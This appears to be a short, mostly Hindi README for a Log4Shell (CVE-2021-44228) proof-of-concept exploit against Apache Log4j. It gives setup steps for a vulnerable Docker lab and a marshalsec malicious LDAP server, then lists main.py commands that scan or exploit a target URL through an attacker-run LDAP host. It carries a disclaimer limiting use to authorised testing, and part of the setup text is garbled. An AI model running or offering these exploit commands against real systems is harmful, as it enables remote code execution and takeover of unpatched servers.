
Log4Shell CVE-2021-44228 PoC
(CVE-2021-44228)
Apache Log4j ≤ 2.14.1 में क्रिटिकल Log4Shell भेद्यता के लिए परीक्षण एक्सप्लॉइट, जो JNDI इंजेक्शन के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है।
⚠️ यह PoC केवल शैक्षिक उद्देश्यों और अधिकृत वातावरणों में नियंत्रित परीक्षणों के लिए है। इसे स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।
marshalsec (दुर्भावनापूर्ण LDAP सर्वर के लिए)python3 -m http.server)भेद्य ऐप चलाएँ:
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
यहाँ पहुँचें: http://localhost:8080
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
python3 main.py -u http://target.com -i burp.collab.net -m detect
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit